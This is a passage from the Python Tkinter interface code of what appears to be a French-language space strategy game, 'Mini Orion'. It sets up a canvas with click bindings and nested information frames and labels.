\"units\"))\n\n\t\tself.canevas.focus_set()\n\t\t\n\t\tself.canevas.bind(\"\",self.cliqueGaucheCosmos)\n\t\tself.canevas.bind(\"\",self.cliqueDroitCosmos)\n\t\t\n\t\tself.cadreinfo=Frame(self.cadrepartie,width=200,height=100,bg=\"#455571\",relief=RAISED)\n\t\tself.cadreinfo.pack(side=LEFT,fill=Y)\n\t\t\n\t\tself.cadreinfogen=Frame(self.cadreinfo,width=200,height=200,bg=\"#455571\")\n\t\tself.cadreinfogen.pack()\n\t\t\n\t\tself.boiteinfo=Frame(self.cadreinfogen,width=200, height=100,bg=\"#455571\",relief=RAISED)\n\t\tself.boiteinfo.pack(side=BOTTOM)\n\t\t\n\t\tself.boiteinfo2=Frame(self.boiteinfo,width=200, height=100,bg=\"#455571\",relief=RAISED)\n\t\tself.boiteinfo2.pack(side=BOTTOM)\n\t\t\n\t\tself.boiteinfo3=Frame(self.boiteinfo2,width=200, height=100,bg=\"#455571\",relief=RAISED)\n\t\tself.boiteinfo3.pack(side=BOTTOM)\n\t\t\n\t\t\n\t\tself.labid=Label(self.cadreinfogen,text=\"MINI\\nORION\",fg=\"#fbbfda\",bg=\"#455571\",font=(\"Helvetica\",20),pady=10)\n\t\tself.labid.bind(\"